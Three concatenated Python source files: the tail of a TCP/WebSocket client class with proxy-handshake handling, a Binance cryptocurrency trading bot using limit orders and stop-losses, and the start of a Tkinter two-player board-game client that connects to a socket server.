self.bufWs = b''.join([self.bufWs, data])
else:
if opcode == WebSocket.WEBSOCKET_OPCODE_PONG:
self.trace(
"received ws pong message id=%s" % data)
elif opcode == WebSocket.WEBSOCKET_OPCODE_PING:
self.trace(
"received ws ping message id=%s" % data)
wspong = self.wsCodec.encodePong(data=data)
self.queue.put(wspong)
self.trace(
"sending pong message id=%s" % data)
else:
self.error(
'unknown ws opcode received: %s' % opcode)
self.readBufferWs()
if len(self.buf) >= 2:
self.onIncomingData()
else: # old style
self.readBuffer()
except Exception as e:
self.error("error on incoming data: %s" % e)
def readBufferWs(self):
"""
Read buffer for websocket
"""
pdus = self.bufWs.split(self.terminator)
for pdu in pdus[:-1]:
self.handleIncomingPacket(pdu)
self.bufWs = pdus[-1]
def readBuffer(self):
"""
Read tcp buffer
"""
pdus = self.buf.split(self.terminator)
for pdu in pdus[:-1]:
if not pdu == self.keepAlivePdu:
self.handleIncomingPacket(pdu)
else:
self.trace("received keep-alive from server")
self.buf = pdus[-1]
def decodeWsHandshake(self):
"""
Decode websocket handshake
@return: True if the websocket handshake is successful, False otherwise
@rtype: boolean
"""
readTrueData = False
try:
if self.buf.find(b"\r\n\r\n") != -1:
datasplitted = self.buf.split(b"\r\n\r\n", 1)
rsp = datasplitted[0]
self.trace('ws complete response received')
statusline = rsp.splitlines()[0].split(b" ", 2)
if statusline[0] not in (b"HTTP/1.1"):
self.buf = b''
self.closeConnection()
self.error("Malformed HTTP ws message: %s" % statusline)
self.onWsHanshakeError(
err="Malformed HTTP message ws: %s" %
statusline)
else:
statuscode = int(statusline[1])
if statuscode != 101:
self.buf = b''
self.closeConnection()
self.error(
"Handshake ws refused\nInvalid http status code: %s" %
statuscode)
self.onWsHanshakeError(
err="Handshake ws refused\nInvalid http status code %s" %
statuscode)
else:
# checking ws headers
if not self.wsCodec.checkingWsHeaders(
response=rsp, key=self.wsKey):
self.buf = b''
self.closeConnection()
self.error("Handshake ws refused, invalid headers")
self.onWsHanshakeError(err="Handshake ws refused")
else:
self.trace('Ws handshake accepted')
self.wsHandshakeSuccess = True
if len(datasplitted) > 1:
self.buf = datasplitted[1]
else:
self.buf = b''
readTrueData = True
else:
raise Exception('need more ws headers on response')
except Exception as e:
self.trace(e)
return readTrueData
def decodeProxyResponse(self):
"""
Decode proxy response
@return: True when client is ready to received application data, False otherwise
@rtype: boolean
"""
readTrueData = False
try:
# handle socks4
if self.proxyType == PROXY_TYPE_SOCKS4:
if ord(self.buf[0]) != 0: # bad version on response
self.buf = b''
self.closeConnection()
self.error(
"Socks4: bad response from proxy: %s" %
self.buf[0])
self.onProxyConnectionError(
err="Socks4: bad response from proxy: %s" %
self.buf[0])
else:
if ord(self.buf[1]) != 90: # granted
self.buf = b''
self.error("Socks4 proxy refused the connection!")
self.closeConnection()
self.onProxyConnectionError(
err="Socks4 proxy refused the connection!") # Server returned an error
else:
self.trace('Proxy tunnel established')
readTrueData = True
# Get the bound address/port
self.proxyConnectSuccess = True
self.buf = b''
# handle http
elif self.proxyType == PROXY_TYPE_HTTP:
self.trace("http proxy activated")
self.trace("response received: %s" % self.buf)
# if \r\n\r\n if detected then the response if complete
# otherwise we must wait more data
if self.buf.find(b"\r\n\r\n") != -1:
# read the status line
statusline = self.buf.splitlines()[0].split(b" ", 2)
if statusline[0] not in (b"HTTP/1.0", b"HTTP/1.1"):
self.buf = b''
self.closeConnection()
self.error(
"Bad http response from proxy: %s" %
statusline)
self.onProxyConnectionError(
err="Bad http response from proxy: %s" % statusline)
else:
# extract the status code
statuscode = int(statusline[1])
if statuscode != 200:
self.buf = b''
self.closeConnection()
self.error(
"Http proxy refuses the connection: %s" %
statusline)
self.onProxyConnectionError(
err="The HTTP proxy refuses the connection!\nStatus code received: %s" %
statuscode)
else:
# tunnel established
# continue with ssl if needed
self.trace('Proxy tunnel established')
if self.sslSupport:
certReqs = ssl.CERT_NONE
if self.checkSsl:
certReqs = ssl.CERT_REQUIRED
try:
self.socket = ssl.wrap_socket(
self.socket, cert_reqs=certReqs, ssl_version=self.sslVersion)
self.socket.do_handshake()
except Exception as e:
self.buf = b''
self.closeConnection()
self.error(
"SSL Http proxy refuses to establish the tunnel: %s" % e)
self.onProxyConnectionError(
err="The SSL HTTP proxy refuses to establish the tunnel")
else:
self.proxyConnectSuccess = True
self.buf = b''
readTrueData = True
else:
# set final step
self.proxyConnectSuccess = True
self.buf = b''
readTrueData = True
else:
raise Exception('need more proxy headers: %s' % self.buf)
# handle socks5: not implemented
elif self.proxyType == PROXY_TYPE_SOCKS5:
if ord(self.buf[0]) != 5: # bad version on response
self.error(
"Socks5: bad response from proxy: %s" %
self.buf[0])
self.onProxyConnectionError(
err="Socks5: bad response from proxy: %s" %
self.buf[0])
else:
if ord(self.buf[1]) == 0: # No authentication is required
pass
# we need to perform a basic username/password
elif ord(self.buf[1]) == 2:
pass
else:
self.buf = b''
self.error(
"Socks5: authentication type not supported: %s" %
self.buf[1])
self.onProxyConnectionError(
err="Socks5: authentication type not supported: %s" %
self.buf[1])
else:
self.error('proxy type unknown: %s' % self.proxyType)
readTrueData = True
except Exception as e:
self.error("more data needed for proxy handshake: %s" % e)
return readTrueData
def stop(self):
"""
Stops the thread
"""
self.running = False
self.event.set()
self.trace('Tcp Client Thread Stopped')
def sendHttpPacket(self, packet):
"""
Send packet without terminator
@param packet: packet to send
@type packet: string
"""
if isinstance(packet, bytes): # python 3 support
self.queue.put(packet)
else:
if sys.version_info[0] == 3: # python 3 support
self.queue.put(bytes(packet, "UTF-8"))
else:
self.queue.put(packet)
def sendPacket(self, packet):
"""
Send packet to network, terminator added at the end
@param packet: packet to send
@type packet: string
"""
if self.wsSupport and self.wsHandshakeSuccess:
if sys.version_info[0] == 3: # python 3 support
if isinstance(packet, bytes):
payload_data = packet + self.terminator
else:
payload_data = bytes(packet, "UTF-8") + self.terminator
else:
payload_data = packet + self.terminator
# make chunk
if sys.version_info[0] == 3: # python 3 support
chunks = [payload_data[x:x + self.wsMaxPayloadSize]
for x in range(0, len(payload_data), self.wsMaxPayloadSize)]
else:
chunks = [payload_data[x:x + self.wsMaxPayloadSize]
for x in xrange(0, len(payload_data), self.wsMaxPayloadSize)]
# encode data in the websocket packet and enqueue it
for chunk in chunks:
# encode in text websocket
wsdata = self.wsCodec.encodeText(data=chunk)
if isinstance(packet, bytes): # python 3 support
self.queue.put(wsdata)
else:
if sys.version_info[0] == 3: # python 3 support
self.queue.put(bytes(wsdata, "UTF-8"))
else:
self.queue.put(wsdata)
else:
if isinstance(packet, bytes): # python 3 support
self.queue.put(packet + self.terminator)
else:
if sys.version_info[0] == 3: # python 3 support
self.queue.put(bytes(packet, "UTF-8") + self.terminator)
else:
self.queue.put(packet + self.terminator)
def handleIncomingPacket(self, pdu):
"""
Function to reimplement
Called on incoming packet
@param pdu: payload received
@type pdu: string
"""
self.trace(pdu)
def getLocalAddress(self):
"""
Returns the binding address
@return: local bind address (ip, port)
@rtype: tuple
"""
rslt = self.localAddress
s = self.socket
if s:
try:
rslt = s.getsockname()
except Exception:
pass
return rslt
def onWsHanshakeError(self, err):
"""
Function to reimplement
Called on ws handshake error
@param err: error message
@type err: string
"""
pass
def onWsHanshakeSuccess(self):
"""
Function to reimplement
Called on successful ws handshake
"""
pass
def onProxyConnectionSuccess(self):
"""
Function to reimplement
Called on successful proxy handshake
"""
pass
def onConnection(self):
"""
Function to reimplement
Called on successful tcp connection
"""
pass
def onProxyConnection(self):
"""
Function to reimplement
Called on successful tcp connection on proxy
"""
pass
def onDisconnection(self, byServer=False, inactivityServer=False):
"""
Function to reimplement
Called on successful tcp disconnection
@param byServer: True if the server closes the connection
@type byServer: boolean
"""
pass
def onConnectionRefused(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onResolveHostnameFailed(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onResolveHostnameProxyFailed(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onConnectionTimeout(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onInactivityTimeout(self):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onProxyConnectionRefused(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onProxyConnectionError(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onProxyConnectionTimeout(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def trace(self, txt):
"""
Display txt on screen
@param txt: message
@type txt: string
"""
print(txt)
def error(self, txt):
"""
Display txt on screen
@param txt: message
@type txt: string
"""
print(txt)
|
Trading.py
|
# -*- coding: UTF-8 -*-
# @yasinkuyu
# Define Python imports
import os
import sys
import time
import config
import threading
import math
import logging
import logging.handlers
# Define Custom imports
from Database import Database
from Orders import Orders
formater_str = '%(asctime)s,%(msecs)d %(levelname)s %(name)s: %(message)s'
formatter = logging.Formatter(formater_str)
datefmt="%Y-%b-%d %H:%M:%S"
LOGGER_ENUM = {'debug':'debug.log', 'trading':'trades.log','errors':'general.log'}
#LOGGER_FILE = LOGGER_ENUM['pre']
LOGGER_FILE = "binance-trader.log"
FORMAT = '%(asctime)-15s - %(levelname)s: %(message)s'
logger = logging.basicConfig(filename=LOGGER_FILE, filemode='a',
format=formater_str, datefmt=datefmt,
level=logging.INFO)
# Approximated value to get back the commission for sell and buy
TOKEN_COMMISION = 0.001
BNB_COMMISION = 0.0005
#((eth*0.05)/100)
class Trading():
# Define trade vars
order_id = 0
order_data = None
buy_filled = True
sell_filled = True
buy_filled_qty = 0
sell_filled_qty = 0
# percent (When you drop 10%, sell panic.)
stop_loss = 0
# Buy/Sell qty
quantity = 0
# BTC amount
amount = 0
# float(step_size * math.floor(float(free)/step_size))
step_size = 0
# Define static vars
WAIT_TIME_BUY_SELL = 1 # seconds
WAIT_TIME_CHECK_BUY_SELL = 0.2 # seconds
WAIT_TIME_CHECK_SELL = 5 # seconds
WAIT_TIME_STOP_LOSS = 20 # seconds
MAX_TRADE_SIZE = 7 # int
# Type of commision, Default BNB_COMMISION
commision = BNB_COMMISION
def __init__(self, option):
print("options: {0}".format(option))
# Get argument parse options
self.option = option
# Define parser vars
self.order_id = self.option.orderid
self.quantity = self.option.quantity
self.wait_time = self.option.wait_time
self.stop_loss = self.option.stop_loss
self.increasing = self.option.increasing
self.decreasing = self.option.decreasing
# BTC amount
self.amount = self.option.amount
# Type of commision
if self.option.commision == 'TOKEN':
self.commision = TOKEN_COMMISION
# setup Logger
self.logger = self.setup_logger(self.option.symbol, debug=self.option.debug)
def setup_logger(self, symbol, debug=True):
"""Function setup as many loggers as you want"""
#handler = logging.FileHandler(log_file)
#handler.setFormatter(formatter)
#logger.addHandler(handler)
logger = logging.getLogger(symbol)
stout_handler = logging.StreamHandler(sys.stdout)
if debug:
logger.setLevel(logging.DEBUG)
stout_handler.setLevel(logging.DEBUG)
#handler = logging.handlers.SysLogHandler(address='/dev/log')
#logger.addHandler(handler)
stout_handler.setFormatter(formatter)
logger.addHandler(stout_handler)
return logger
def buy(self, symbol, quantity, buyPrice, profitableSellingPrice):
# Do you have an open order?
self.check_order()
try:
# Create order
orderId = Orders.buy_limit(symbol, quantity, buyPrice)
# Database log
Database.write([orderId, symbol, 0, buyPrice, 'BUY', quantity, self.option.profit])
#print('Buy order created id:%d, q:%.8f, p:%.8f' % (orderId, quantity, float(buyPrice)))
self.logger.info('%s : Buy order created id:%d, q:%.8f, p:%.8f, Take profit aprox :%.8f' % (symbol, orderId, quantity, float(buyPrice), profitableSellingPrice))
self.order_id = orderId
return orderId
except Exception as e:
#print('bl: %s' % (e))
self.logger.debug('Buy error: %s' % (e))
time.sleep(self.WAIT_TIME_BUY_SELL)
return None
def sell(self, symbol, quantity, orderId, sell_price, last_price):
'''
The specified limit will try to sell until it reaches.
If not successful, the order will be canceled.
'''
buy_order = Orders.get_order(symbol, orderId)
if buy_order['status'] == 'FILLED' and buy_order['side'] == 'BUY':
#print('Buy order filled... Try sell...')
self.logger.info('Buy order filled... Try sell...')
else:
time.sleep(self.WAIT_TIME_CHECK_BUY_SELL)
if buy_order['status'] == 'FILLED' and buy_order['side'] == 'BUY':
#print('Buy order filled after 0.1 second... Try sell...')
self.logger.info('Buy order filled after 0.1 second... Try sell...')
elif buy_order['status'] == 'PARTIALLY_FILLED' and buy_order['side'] == 'BUY':
#print('Buy order partially filled... Try sell... Cancel remaining buy...')
self.logger.info('Buy order partially filled... Try sell... Cancel remaining buy...')
self.cancel(symbol, orderId)
else:
self.cancel(symbol, orderId)
#print('Buy order fail (Not filled) Cancel order...')
self.logger.warning('Buy order fail (Not filled) Cancel order...')
self.order_id = 0
return
sell_order = Orders.sell_limit(symbol, quantity, sell_price)
sell_id = sell_order['orderId']
#print('Sell order create id: %d' % sell_id)
self.logger.info('Sell order create id: %d' % sell_id)
time.sleep(self.WAIT_TIME_CHECK_SELL)
if sell_order['status'] == 'FILLED':
#print('Sell order (Filled) Id: %d' % sell_id)
#print('LastPrice : %.8f' % last_price)
#print('Profit: %%%s. Buy price: %.8f Sell price: %.8f' % (self.option.profit, float(sell_order['price']), sell_price))
self.logger.info('Sell order (Filled) Id: %d' % sell_id)
self.logger.info('LastPrice : %.8f' % last_price)
self.logger.info('Profit: %%%s. Buy price: %.8f Sell price: %.8f' % (self.option.profit, float(sell_order['price']), sell_price))
self.order_id = 0
self.order_data = None
return
'''
If all sales trials fail,
the grievance is stop-loss.
'''
if self.stop_loss > 0:
# If sell order failed after 5 seconds, 5 seconds more wait time before selling at loss
time.sleep(self.WAIT_TIME_CHECK_SELL)
if self.stop(symbol, quantity, sell_id, last_price):
if Orders.get_order(symbol, sell_id)['status'] != 'FILLED':
#print('We apologize... Sold at loss...')
self.logger.info('We apologize... Sold at loss...')
else:
#print('We apologize... Cant sell even at loss... Please sell manually... Stopping program...')
self.logger.info('We apologize... Cant sell even at loss... Please sell manually... Stopping program...')
self.cancel(symbol, sell_id)
exit(1)
while (sell_status != 'FILLED'):
time.sleep(self.WAIT_TIME_CHECK_SELL)
sell_status = Orders.get_order(symbol, sell_id)['status']
lastPrice = Orders.get_ticker(symbol)
#print('Status: %s Current price: %.8f Sell price: %.8f' % (sell_status, lastPrice, sell_price))
#print('Sold! Continue trading...')
self.logger.info('Status: %s Current price: %.8f Sell price: %.8f' % (sell_status, lastPrice, sell_price))
self.logger.info('Sold! Continue trading...')
self.order_id = 0
self.order_data = None
def stop(self, symbol, quantity, orderId, last_price):
# If the target is not reached, stop-loss.
stop_order = Orders.get_order(symbol, orderId)
stopprice = self.calc(float(stop_order['price']))
lossprice = stopprice - (stopprice * self.stop_loss / 100)
status = stop_order['status']
# Order status
if status == 'NEW' or status == 'PARTIALLY_FILLED':
if self.cancel(symbol, orderId):
# Stop loss
if last_price >= lossprice:
sello = Orders.sell_market(symbol, quantity)
#print('Stop-loss, sell market, %s' % (last_price))
self.logger.info('Stop-loss, sell market, %s' % (last_price))
sell_id = sello['orderId']
if sello == True:
return True
else:
# Wait a while after the sale to the loss.
time.sleep(self.WAIT_TIME_STOP_LOSS)
statusloss = sello['status']
if statusloss != 'NEW':
print('Stop-loss, sold')
self.logger.info('Stop-loss, sold')
return True
else:
self.cancel(symbol, sell_id)
return False
else:
sello = Orders.sell_limit(symbol, quantity, lossprice)
print('Stop-loss, sell limit, %s' % (lossprice))
time.sleep(self.WAIT_TIME_STOP_LOSS)
statusloss = sello['status']
if statusloss != 'NEW':
print('Stop-loss, sold')
return True
else:
self.cancel(symbol, sell_id)
return False
else:
print('Cancel did not work... Might have been sold before stop loss...')
return True
elif status == 'FILLED':
self.order_id = 0
self.order_data = None
print('Order filled')
return True
else:
return False
def check(self, symbol, orderId, quantity):
# If profit is available and there is no purchase from the specified price, take it with the market.
# Do you have an open order?
self.check_order()
trading_size = 0
time.sleep(self.WAIT_TIME_BUY_SELL)
while trading_size < self.MAX_TRADE_SIZE:
# Order info
order = Orders.get_order(symbol, orderId)
side = order['side']
price = float(order['price'])
# TODO: Sell partial qty
orig_qty = float(order['origQty'])
self.buy_filled_qty = float(order['executedQty'])
status = order['status']
#print('Wait buy order: %s id:%d, price: %.8f, orig_qty: %.8f' % (symbol, order['orderId'], price, orig_qty))
self.logger.info('Wait buy order: %s id:%d, price: %.8f, orig_qty: %.8f' % (symbol, order['orderId'], price, orig_qty))
if status == 'NEW':
if self.cancel(symbol, orderId):
buyo = Orders.buy_market(symbol, quantity)
#print('Buy market order')
self.logger.info('Buy market order')
self.order_id = buyo['orderId']
self.order_data = buyo
if buyo == True:
break
else:
trading_size += 1
continue
else:
break
elif status == 'FILLED':
self.order_id = order['orderId']
self.order_data = order
#print('Filled')
self.logger.info('Filled')
break
elif status == 'PARTIALLY_FILLED':
#print('Partial filled')
self.logger.info('Partial filled')
break
else:
trading_size += 1
continue
def cancel(self, symbol, orderId):
# If order is not filled, cancel it.
check_order = Orders.get_order(symbol, orderId)
if not check_order:
self.order_id = 0
self.order_data = None
return True
if check_order['status'] == 'NEW' or check_order['status'] != 'CANCELLED':
Orders.cancel_order(symbol, orderId)
self.order_id = 0
self.order_data = None
return True
def calc(self, lastBid):
try:
#Estimated sell price considering commision
return lastBid + (lastBid * self.option.profit / 100) + (lastBid *self.commision)
#return lastBid + (lastBid * self.option.profit / 100)
except Exception as e:
print('Calc Error: %s' % (e))
return
def check_order(self):
# If there is an open order, exit.
if self.order_id > 0:
exit(1)
def action(self, symbol):
#import ipdb; ipdb.set_trace()
# Order amount
quantity = self.quantity
# Fetches the ticker price
lastPrice = Orders.get_ticker(symbol)
# Order book prices
lastBid, lastAsk = Orders.get_order_book(symbol)
# Target buy price, add little increase #87
buyPrice = lastBid + self.increasing
# Target sell price, decrease little
sellPrice = lastAsk - self.decreasing
# Spread ( profit )
profitableSellingPrice = self.calc(lastBid)
# Check working mode
if self.option.mode == 'range':
buyPrice = float(self.option.buyprice)
sellPrice = float(self.option.sellprice)
profitableSellingPrice = sellPrice
# Screen log
if self.option.prints and self.order_id == 0:
spreadPerc = (lastAsk/lastBid - 1) * 100.0
#print('price:%.8f buyp:%.8f sellp:%.8f-bid:%.8f ask:%.8f spread:%.2f' % (lastPrice, buyPrice, profitableSellingPrice, lastBid, lastAsk, spreadPerc))
self.logger.debug('price:%.8f buyprice:%.8f sellprice:%.8f bid:%.8f ask:%.8f spread:%.2f Originalsellprice:%.8f' % (lastPrice, buyPrice, profitableSellingPrice, lastBid, lastAsk, spreadPerc, profitableSellingPrice-(lastBid *self.commision) ))
# analyze = threading.Thread(target=analyze, args=(symbol,))
# analyze.start()
if self.order_id > 0:
# Profit mode
if self.order_data is not None:
order = self.order_data
# Last control
newProfitableSellingPrice = self.calc(float(order['price']))
if (lastAsk >= newProfitableSellingPrice):
profitableSellingPrice = newProfitableSellingPrice
# range mode
if self.option.mode == 'range':
profitableSellingPrice = self.option.sellprice
'''
If the order is complete,
try to sell it.
'''
# Perform buy action
sellAction = threading.Thread(target=self.sell, args=(symbol, quantity, self.order_id, profitableSellingPrice, lastPrice,))
sellAction.start()
return
'''
Did profit get caught
if ask price is greater than profit price,
buy with my buy price,
'''
if (lastAsk >= profitableSellingPrice and self.option.mode == 'profit') or \
(lastPrice <= float(self.option.buyprice) and self.option.mode == 'range'):
self.logger.info ("MOde: {0}, Lastsk: {1}, Profit Sell Price {2}, ".format(self.option.mode, lastAsk, profitableSellingPrice))
if self.order_id == 0:
self.buy(symbol, quantity, buyPrice, profitableSellingPrice)
# Perform check/sell action
# checkAction = threading.Thread(target=self.check, args=(symbol, self.order_id, quantity,))
# checkAction.start()
def logic(self):
return 0
def filters(self):
symbol = self.option.symbol
# Get symbol exchange info
symbol_info = Orders.get_info(symbol)
if not symbol_info:
#print('Invalid symbol, please try again...')
self.logger.error('Invalid symbol, please try again...')
exit(1)
symbol_info['filters'] = {item['filterType']: item for item in symbol_info['filters']}
return symbol_info
def format_step(self, quantity, stepSize):
return float(stepSize * math.floor(float(quantity)/stepSize))
def validate(self):
valid = True
symbol = self.option.symbol
filters = self.filters()['filters']
# Order book prices
lastBid, lastAsk = Orders.get_order_book(symbol)
lastPrice = Orders.get_ticker(symbol)
minQty = float(filters['LOT_SIZE']['minQty'])
minPrice = float(filters['PRICE_FILTER']['minPrice'])
minNotional = float(filters['MIN_NOTIONAL']['minNotional'])
quantity = float(self.option.quantity)
# stepSize defines the intervals that a quantity/icebergQty can be increased/decreased by.
stepSize = float(filters['LOT_SIZE']['stepSize'])
# tickSize defines the intervals that a price/stopPrice can be increased/decreased by
tickSize = float(filters['PRICE_FILTER']['tickSize'])
# If option increasing default tickSize greater than
if (float(self.option.increasing) < tickSize):
self.increasing = tickSize
# If option decreasing default tickSize greater than
if (float(self.option.decreasing) < tickSize):
self.decreasing = tickSize
# Just for validation
lastBid = lastBid + self.increasing
# Set static
# If quantity or amount is zero, minNotional increase 10%
quantity = (minNotional / lastBid)
quantity = quantity + (quantity * 10 / 100)
notional = minNotional
if self.amount > 0:
# Calculate amount to quantity
quantity = (self.amount / lastBid)
if self.quantity > 0:
# Format quantity step
quantity = self.quantity
quantity = self.format_step(quantity, stepSize)
notional = lastBid * float(quantity)
# Set Globals
self.quantity = quantity
self.step_size = stepSize
# minQty = minimum order quantity
if quantity < minQty:
#print('Invalid quantity, minQty: %.8f (u: %.8f)' % (minQty, quantity))
self.logger.error('Invalid quantity, minQty: %.8f (u: %.8f)' % (minQty, quantity))
valid = False
if lastPrice < minPrice:
#print('Invalid price, minPrice: %.8f (u: %.8f)' % (minPrice, lastPrice))
self.logger.error('Invalid price, minPrice: %.8f (u: %.8f)' % (minPrice, lastPrice))
valid = False
# minNotional = minimum order value (price * quantity)
if notional < minNotional:
#print('Invalid notional, minNotional: %.8f (u: %.8f)' % (minNotional, notional))
self.logger.error('Invalid notional, minNotional: %.8f (u: %.8f)' % (minNotional, notional))
valid = False
if not valid:
exit(1)
def run(self):
cycle = 0
actions = []
symbol = self.option.symbol
print('Auto Trading for Binance.com @yasinkuyu')
print('\n')
# Validate symbol
self.validate()
print('Started...')
print('Trading Symbol: %s' % symbol)
print('Buy Quantity: %.8f' % self.quantity)
print('Stop-Loss Amount: %s' % self.stop_loss)
#print('Estimated profit: %.8f' % (self.quantity*self.option.profit))
if self.option.mode == 'range':
if self.option.buyprice == 0 or self.option.sellprice == 0:
print('Please enter --buyprice / --sellprice\n')
exit(1)
print('Range Mode Options:')
print('\tBuy Price: %.8f', self.option.buyprice)
print('\tSell Price: %.8f', self.option.sellprice)
else:
print('Profit Mode Options:')
print('\tPreferred Profit: %0.2f%%' % self.option.profit)
print('\tBuy Price : (Bid+ --increasing %.8f)' % self.increasing)
print('\tSell Price: (Ask- --decreasing %.8f)' % self.decreasing)
print('\n')
startTime = time.time()
"""
# DEBUG LINES
actionTrader = threading.Thread(target=self.action, args=(symbol,))
actions.append(actionTrader)
actionTrader.start()
endTime = time.time()
if endTime - startTime < self.wait_time:
time.sleep(self.wait_time - (endTime - startTime))
# 0 = Unlimited loop
if self.option.loop > 0:
cycle = cycle + 1
"""
while (cycle <= self.option.loop):
startTime = time.time()
actionTrader = threading.Thread(target=self.action, args=(symbol,))
actions.append(actionTrader)
actionTrader.start()
endTime = time.time()
if endTime - startTime < self.wait_time:
time.sleep(self.wait_time - (endTime - startTime))
# 0 = Unlimited loop
if self.option.loop > 0:
cycle = cycle + 1
|
__init__.py
|
######## This is the main file that creates an instance of the game using Tkinter
######## Run the "server.py" file before you run this file
import socket
import threading
from queue import Queue
HOST = input("Enter server's IP address: ") # user should enter the IP address displayed on the server window
PORT = int(input("Enter PORT number: ")) # user should enter the PORT number displayed on the server window
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try:
server.connect((HOST,PORT))
print("Connected to server.")
break
except:
print("\nConnection failed. Try again.\n")
HOST = input("Enter server's IP address:")
PORT = int(input("Enter PORT number:"))
#################################################################
# Sockets client code copied from 15-112 Sockets mini-lecture
def handleServerMsg(server, serverMsg):
server.setblocking(1)
msg = ""
command = ""
while True:
msg += server.recv(10).decode("UTF-8")
command = msg.split("\n")
while (len(command) > 1):
readyMsg = command[0]
msg = "\n".join(command[1:])
serverMsg.put(readyMsg)
command = msg.split("\n")
#################################################################
from pieceClasses import *
from algorithms import *
import copy
import random
#### Graphics Functions
from tkinter import *
def init(data):
data.background = PhotoImage(file="background.gif", width=data.width, height=data.height) # image downloaded from https://v.paixin.com/photocopyright/132056282
data.countdown = 20
data.isPaused = False
data.board = [ [Post(0, 0, LMN("A")), Headquarters(0, 1, Flag("A")), Post(0, 2, Capt("A")), Headquarters(0, 3, LMN("A")), Post(0, 4, LMN("A"))],
[Post(1, 0, Capt("A")), Post(1, 1, Lt("A")), Post(
1, 2, BGen("A")), Post(1, 3, Spr("A")), Post(1, 4, Spr("A"))],
[Post(2, 0, MGen("A")), Camp(2, 1), Post(
2, 2, Lt("A")), Camp(2, 3), Post(2, 4, Maj("A"))],
[Post(3, 0, Gen("A")), Post(3, 1, Bomb("A")), Camp(
3, 2), Post(3, 3, Lt("A")), Post(3, 4, Mar("A"))],
[Post(4, 0, Maj("A")), Camp(4, 1), Post(4, 2, Spr("A")),
Camp(4, 3), Post(4, 4, Bomb("A"))],
[Post(5, 0, MGen("A")), Post(5, 1, Col("A")), Post(
5, 2, BGen("A")), Post(5, 3, Capt("A")), Post(5, 4, Col("A"))],
[Post(6, 0, MGen("B")), Post(6, 1, Spr("B")), Post(
6, 2, Capt("B")), Post(6, 3, Mar("B")), Post(6, 4, Col("B"))],
[Post(7, 0, Bomb("B")), Camp(7, 1), Post(
7, 2, Spr("B")), Camp(7, 3), Post(7, 4, Bomb("B"))],
[Post(8, 0, Capt("B")), Post(8, 1, Maj("B")), Camp(
8, 2), Post(8, 3, BGen("B")), Post(8, 4, Lt("B"))],
[Post(9, 0, Maj("B")), Camp(9, 1), Post(
9, 2, BGen("B")), Camp(9, 3), Post(9, 4, Gen("B"))],
[Post(10, 0, LMN("B")), Post(10, 1, Lt("B")), Post(
10, 2, Spr("B")), Post(10, 3, MGen("B")), Post(10, 4, LMN("B"))],
[Post(11, 0, Capt("B")), Headquarters(11, 1, Lt("B")), Post(11, 2, Col("B")), Headquarters(11, 3, Flag("B")), Post(11, 4, LMN("B"))]]
data.mode = "start"
data.lastMode = data.mode
data.turn = "B"
data.selectCount = 0
data.firstSelect, data.secondSelect = None, None
data.move = None
data.myPID = None
data.selfPlayerReady, data.otherPlayerReady = False, False
data.darkMode = False
data.marA = True
data.marB = True
data.winner = None
data.errorMsg = None
data.maxDepth = 0
data.otherPlayerOnline = False
data.displaySuggestedMove = 0
data.timer = None
data.playerMove = None
# a helper function that switches two piece for the layout mode
# return an error message if the switch is illegal (and return None if legal)
def switch(data):
(a, b) = data.firstSelect
(c, d) = data.secondSelect
# pieces must stay within their own side
if data.board[a][b].piece.side != data.board[c][d].piece.side:
return "Cannot switch pieces of the other side!"
# flags must remain in headquarters
if data.board[a][b].piece.order == 0 and (((a, b) == (0, 1) or (a, b) == (0, 3)) and ((c, d) != (0, 1) and (c, d) != (0, 3))) or \
(((a, b) == (11, 1) or (a, b) == (11, 3)) and ((c, d) != (11, 1) and (c, d) != (11, 3))):
return "Flags must be placed in a Headquarter!"
if data.board[c][d].piece.order == 0 and (((c, d) == (0, 1) or (c, d) == (0, 3)) and ((a, b) != (0, 1) and (a, b) != (0, 3))) or \
(((c, d) == (11, 1) or (c, d) == (11, 3)) and ((a, b) != (11, 1) and (a, b) != (11, 3))):
return "The Flag must be placed in one of the two Headquarters!"
# bombs cannot be on the front row
if data.board[a][b].piece.order == None and (c == 5 or c == 6):
return "Bombs cannot be placed on the front row!"
if data.board[c][d].piece.order == None and (a == 5 or a == 6):
return "Bombs cannot be placed on the front row!"
# landmines must remain at the last two rows
if data.board[a][b].piece.order == 10 and (c in [2, 3, 4, 5, 6, 7, 8, 9]):
return "Landmines can only be placed on the last two rows!"
if data.board[c][d].piece.order == 10 and (a in [2, 3, 4, 5, 6, 7, 8, 9]):
return "Landmines can only be placed on the last two rows!"
data.board[a][b].piece, data.board[c][d].piece = data.board[c][d].piece, data.board[a][b].piece
# undo selection
data.selectCount = 0
data.board[a][b].select()
data.board[c][d].select()
return None
def mousePressed(event, data):
if data.mode == "start":
if 200 < event.x < 400 and 500 < event.y < 580:
data.darkMode = True
if 200 < event.x < 400 and 340 < event.y < 400:
data.mode = "selectDifficulty"
elif 200 < event.x < 400 and (420 < event.y < 480 or 500 < event.y < 580):
data.mode = "twoPlayerLayout"
elif data.mode == "selectDifficulty":
if 200 < event.x < 400 and 340 < event.y < 400:
# easy mode
data.maxDepth = 2
data.mode = "onePlayerLayout"
elif 200 < event.x < 400 and 420 < event.y < 480:
# hard mode
data.maxDepth = 4
data.mode = "onePlayerLayout"
elif data.mode == "twoPlayerLayout" and data.otherPlayerOnline:
if 385 < event.x < 465 and 380 < event.y < 420:
# player is ready
data.selectCount = 0
data.firstSelect = None
data.selfPlayerReady = True
for x in range(12):
for y in range(5):
if data.board[x][y].selected:
data.board[x][y].selected = False
msg = "playerReady +1\n"
print("sending: ", msg)
data.server.send(msg.encode())
if getLocation(event.x, event.y) != None:
(i, j) = getLocation(event.x, event.y)
if data.myPID == "PlayerA":
(i, j) = (11-i, 4-j) # reverse the board
# cannot put pieces in Camps during layout stage
if type(data.board[i][j]) == Camp:
return None
# cannot change the layout of the other side
if data.myPID == "PlayerA" and i >= 6:
return None
elif data.myPID == "PlayerB" and i < 6:
return None
data.selectCount += 1
data.board[i][j].select()
if data.selectCount == 1:
data.firstSelect = (i, j)
elif data.selectCount == 2:
data.secondSelect = (i, j)
(a, b) = data.firstSelect
(c, d) = data.secondSelect
data.errorMsg = switch(data)
